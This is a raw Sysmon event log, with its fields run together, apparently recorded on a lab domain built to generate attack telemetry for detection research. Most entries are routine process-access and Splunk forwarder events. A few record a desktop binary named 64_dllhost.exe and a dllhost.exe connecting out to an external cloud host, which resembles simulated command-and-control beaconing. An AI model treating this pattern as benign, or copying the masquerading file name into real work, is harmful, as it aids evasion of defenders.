19:17:59.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095017Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:59.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095022Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.907{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA1952174E8AFA70BCF0EECC573E9AA,SHA256=DB1EEFACF6D9558624D19F55C4A7542908D440D3525FD4B1D79D3F8FAA338840,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001606044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.804{21761711-C665-607D-D60D-00000000BB01}4492WIN-HOST-5\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\datareporting\aborted-session-pingMD5=F80F87145358A8F5A36FF7257D831AE4,SHA256=548CEE8C250677A72E347DC07726167903180AB3596DBB031BD809F78EC42861falsefalse - insufficient disk space 11241100x80000000000000001606043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.804{21761711-C665-607D-D60D-00000000BB01}4492C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\meudewsu.default-release\datareporting\aborted-session-ping.tmp2021-04-21 19:18:00.804 11241100x80000000000000001606042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.220{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606041Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.220{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEF094076F5A5DD5F2047CB984FA273B,SHA256=30CA25C8937A887CC7C4B86DAA6FEDF91B5205ECEA0379BB36BCFDC2AEFDD871falsefalse - insufficient disk space 11241100x80000000000000001606040Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.219{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606039Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:00.219{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC19776DBBFBEFBB7462F264E840555F,SHA256=4C6E1C0BE8DE741E501D674008AE53269F107398233C10BA7FF9C09FAD7D82BFfalsefalse - insufficient disk space 10341000x80000000000000001095021Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095020Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095025Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:01.912{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12828E4ABA6EFEA8342954ECB8FC3284,SHA256=E795041B1A5D89EFA8022991AF3FD448ADD2576791353AC71184B884A3B52685,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.766{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49726-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:01.042{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:01.042{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F22FF4A0A1DE3E81918E6A78A815E73,SHA256=B485D14D3DE5297FEF883502C7F5BCCB4DB45E76EDF4D7C13027D4E3A9995FAEfalsefalse - insufficient disk space 10341000x80000000000000001095024Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:01.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095023Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:01.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095030Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.915{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6494554F9E28116467DBCD299A523B5A,SHA256=F298E278D3BD0B9CD91440433693FA3D224CE2978BE513272CB1766518DD1986,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:02.076{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:02.076{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA35821A6FC16F2E4089896E1A0F868,SHA256=281F4D04801D7EAB06A273B2C1D4E4CD8BC48DA373CC42FACE0744BD163ECB27falsefalse - insufficient disk space 10341000x80000000000000001095029Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095028Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095027Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.473{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=558C0D3C144F7FC9DFE6CA4DD7D5D975,SHA256=36B03D4676A4DE5FFA81F094768671C4926A5604B120679A6D5E38E7BE4A19FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095026Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:02.472{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=991BBADCB91968A3B3C85363605EC044,SHA256=213BAC42A49CC6E7324FE50CA83DFB9D037A0B44A3BB67960D5822CA75568424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095035Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.938{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C85B1A256B5FA2ED5FCAF50C323C977,SHA256=E6D269024AD55B9A540EB1F2F21BB80768CF342059B9E5E336A0A49157440AB6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:03.078{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:03.078{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03396CF7C1AB604C38DD32918EDDD8C6,SHA256=88A69F04AEEE71C8F1041E5576D28CBF3BC84DA155C04F23148A0DCC9B6BFCF3falsefalse - insufficient disk space 354300x80000000000000001095034Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.626{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1143-false10.0.1.12-8000- 354300x80000000000000001095033Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.046{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1142-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095032Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095031Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095039Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.941{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0F57F6A4F8A0EB0315214AECDEAB801,SHA256=54A267DFD1589E101F198AA89490A508CF9E48552E36ECA664F067CBDD53EF33,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:04.265{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:04.265{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F2197F8437E06A9C79EBD4BF49FB55,SHA256=56099CE26A56BC47B31830C631A95A77CDC47391B53C0BBF6BD1E66425C9A408falsefalse - insufficient disk space 23542300x80000000000000001095038Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.732{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=558C0D3C144F7FC9DFE6CA4DD7D5D975,SHA256=36B03D4676A4DE5FFA81F094768671C4926A5604B120679A6D5E38E7BE4A19FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095037Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095036Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:04.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095043Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:05.952{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0A2DAE94DA8AB64CB9D595A96CC54E,SHA256=47A1D3BE81C94B744A0C73AD80EB281A5D162D33B530461EA556D0BD0A4DDE6C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:05.500{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:05.500{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75AE2CD67ECE89491742D1D3C2441695,SHA256=5F2A3BFE41A137DD3291C98E8CA2BE0F08D33FF1B13250545DD57A042A0F2754falsefalse - insufficient disk space 354300x80000000000000001095042Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:00.330{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1144-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095041Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:05.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095040Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:05.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095046Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:06.961{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD6F22CCB529082AE91C0C2D6DBC79C,SHA256=7CC859DDE812CDB67348631C4DC2485DA99AAD1D9342BC86C10826CDE9386695,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:04.602{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49727-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.502{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.502{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC51D6AC38446277EE07CA73093CC230,SHA256=742DE59BE9F491F9BB56DDB836C89160305A52553E92494E4CA9D15102D3088Bfalsefalse - insufficient disk space 10341000x80000000000000001095045Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:06.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095044Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 